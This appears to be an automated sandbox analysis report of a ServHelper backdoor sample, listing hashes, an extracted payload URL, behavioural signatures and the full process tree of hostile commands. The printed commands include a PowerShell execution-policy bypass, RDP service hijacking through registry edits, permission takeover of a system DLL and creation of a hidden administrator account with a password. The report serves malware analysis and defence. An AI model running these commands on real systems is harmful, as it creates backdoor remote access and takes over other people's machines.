Analysis
-
max time kernel
133s -
max time network
173s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
19-04-2022 06:01
Static task
static1
Behavioral task
behavioral1
Sample
f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe
Resource
win10v2004-20220414-en
General
-
Target
f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe
-
Size
3.5MB
-
MD5
430153f225c19501842717a80283c9ed
-
SHA1
b53056dd325af27d8c295731dbbe102ace42def6
-
SHA256
f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab
-
SHA512
a9051ad3af63a3bed0c63ab7e6ea26a8b4fc944bbf4eca394f1ea07f645c0fd94551fe2b33d86ca62fc86f6ee2ee515ad95b51473511466a679858468cdba8d2
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 10 IoCs
Processes:
powershell.exeflow pid process 33 4368 powershell.exe 36 4368 powershell.exe 37 4368 powershell.exe 39 4368 powershell.exe 40 4368 powershell.exe 42 4368 powershell.exe 45 4368 powershell.exe 47 4368 powershell.exe 49 4368 powershell.exe 52 4368 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exepid process 404 icacls.exe 5004 icacls.exe 1648 icacls.exe 1976 icacls.exe 2200 takeown.exe 3860 icacls.exe 3500 icacls.exe 3512 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule C:\Windows\Branding\mediasrv.png upx C:\Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 2284 2284 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exepid process 3512 icacls.exe 404 icacls.exe 5004 icacls.exe 1648 icacls.exe 1976 icacls.exe 2200 takeown.exe 3860 icacls.exe 3500 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 18 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\shellbrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIBB61.tmp powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIBB90.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIBC01.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1cvts5ze.mgh.ps1 powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_j5xyjmae.y3s.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIBBA1.tmp powershell.exe File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIBBD1.tmp powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3768 4984 WerFault.exe f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc stream HTTP User-Agent header 40 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) 1 HTTP User-Agent header 42 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) 1 HTTP User-Agent header 36 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 37 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) 1 HTTP User-Agent header 39 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exepid process 1756 powershell.exe 1756 powershell.exe 1756 powershell.exe 1756 powershell.exe 1756 powershell.exe 4368 powershell.exe 4368 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 652 652 -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
powershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1756 powershell.exe Token: SeRestorePrivilege 3500 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1452 WMIC.exe Token: SeIncreaseQuotaPrivilege 1452 WMIC.exe Token: SeAuditPrivilege 1452 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1452 WMIC.exe Token: SeIncreaseQuotaPrivilege 1452 WMIC.exe Token: SeAuditPrivilege 1452 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2240 WMIC.exe Token: SeIncreaseQuotaPrivilege 2240 WMIC.exe Token: SeAuditPrivilege 2240 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2240 WMIC.exe Token: SeIncreaseQuotaPrivilege 2240 WMIC.exe Token: SeAuditPrivilege 2240 WMIC.exe Token: SeDebugPrivilege 4368 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 4984 wrote to memory of 1756 4984 f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe powershell.exe PID 4984 wrote to memory of 1756 4984 f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe powershell.exe PID 1756 wrote to memory of 1108 1756 powershell.exe csc.exe PID 1756 wrote to memory of 1108 1756 powershell.exe csc.exe PID 1108 wrote to memory of 3712 1108 csc.exe cvtres.exe PID 1108 wrote to memory of 3712 1108 csc.exe cvtres.exe PID 1756 wrote to memory of 2200 1756 powershell.exe takeown.exe PID 1756 wrote to memory of 2200 1756 powershell.exe takeown.exe PID 1756 wrote to memory of 3860 1756 powershell.exe icacls.exe PID 1756 wrote to memory of 3860 1756 powershell.exe icacls.exe PID 1756 wrote to memory of 3500 1756 powershell.exe icacls.exe PID 1756 wrote to memory of 3500 1756 powershell.exe icacls.exe PID 1756 wrote to memory of 3512 1756 powershell.exe icacls.exe PID 1756 wrote to memory of 3512 1756 powershell.exe icacls.exe PID 1756 wrote to memory of 404 1756 powershell.exe icacls.exe PID 1756 wrote to memory of 404 1756 powershell.exe icacls.exe PID 1756 wrote to memory of 5004 1756 powershell.exe icacls.exe PID 1756 wrote to memory of 5004 1756 powershell.exe icacls.exe PID 1756 wrote to memory of 1648 1756 powershell.exe icacls.exe PID 1756 wrote to memory of 1648 1756 powershell.exe icacls.exe PID 1756 wrote to memory of 1976 1756 powershell.exe icacls.exe PID 1756 wrote to memory of 1976 1756 powershell.exe icacls.exe PID 1756 wrote to memory of 4232 1756 powershell.exe reg.exe PID 1756 wrote to memory of 4232 1756 powershell.exe reg.exe PID 1756 wrote to memory of 4600 1756 powershell.exe reg.exe PID 1756 wrote to memory of 4600 1756 powershell.exe reg.exe PID 1756 wrote to memory of 2940 1756 powershell.exe reg.exe PID 1756 wrote to memory of 2940 1756 powershell.exe reg.exe PID 1756 wrote to memory of 220 1756 powershell.exe net.exe PID 1756 wrote to memory of 220 1756 powershell.exe net.exe PID 220 wrote to memory of 4120 220 net.exe net1.exe PID 220 wrote to memory of 4120 220 net.exe net1.exe PID 1756 wrote to memory of 5096 1756 powershell.exe cmd.exe PID 1756 wrote to memory of 5096 1756 powershell.exe cmd.exe PID 5096 wrote to memory of 2332 5096 cmd.exe cmd.exe PID 5096 wrote to memory of 2332 5096 cmd.exe cmd.exe PID 2332 wrote to memory of 3156 2332 cmd.exe net.exe PID 2332 wrote to memory of 3156 2332 cmd.exe net.exe PID 3156 wrote to memory of 2156 3156 net.exe net1.exe PID 3156 wrote to memory of 2156 3156 net.exe net1.exe PID 1756 wrote to memory of 1088 1756 powershell.exe cmd.exe PID 1756 wrote to memory of 1088 1756 powershell.exe cmd.exe PID 1088 wrote to memory of 4028 1088 cmd.exe cmd.exe PID 1088 wrote to memory of 4028 1088 cmd.exe cmd.exe PID 4028 wrote to memory of 2964 4028 cmd.exe net.exe PID 4028 wrote to memory of 2964 4028 cmd.exe net.exe PID 2964 wrote to memory of 3348 2964 net.exe net1.exe PID 2964 wrote to memory of 3348 2964 net.exe net1.exe PID 1756 wrote to memory of 3412 1756 powershell.exe cmd.exe PID 1756 wrote to memory of 3412 1756 powershell.exe cmd.exe PID 1756 wrote to memory of 3352 1756 powershell.exe cmd.exe PID 1756 wrote to memory of 3352 1756 powershell.exe cmd.exe PID 3596 wrote to memory of 4068 3596 cmd.exe net.exe PID 3596 wrote to memory of 4068 3596 cmd.exe net.exe PID 4068 wrote to memory of 952 4068 net.exe net1.exe PID 4068 wrote to memory of 952 4068 net.exe net1.exe PID 3968 wrote to memory of 5064 3968 cmd.exe net.exe PID 3968 wrote to memory of 5064 3968 cmd.exe net.exe PID 5064 wrote to memory of 540 5064 net.exe net1.exe PID 5064 wrote to memory of 540 5064 net.exe net1.exe PID 5052 wrote to memory of 3964 5052 cmd.exe net.exe PID 5052 wrote to memory of 3964 5052 cmd.exe net.exe PID 3964 wrote to memory of 3984 3964 net.exe net1.exe PID 3964 wrote to memory of 3984 3964 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe"C:\Users\Admin\AppData\Local\Temp\f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2o5ylb4h\2o5ylb4h.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDDF.tmp" "c:\Users\Admin\AppData\Local\Temp\2o5ylb4h\CSC9AEA88AD1398439A97F918B61E789921.TMP"4⤵
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4984 -s 6522⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4984 -ip 49841⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc AOSzoi1P /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc AOSzoi1P /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc AOSzoi1P /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" TWJYXOUL$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" TWJYXOUL$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TWJYXOUL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc AOSzoi1P1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc AOSzoi1P2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc AOSzoi1P3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Suspicious use of AdjustPrivilegeToken
-
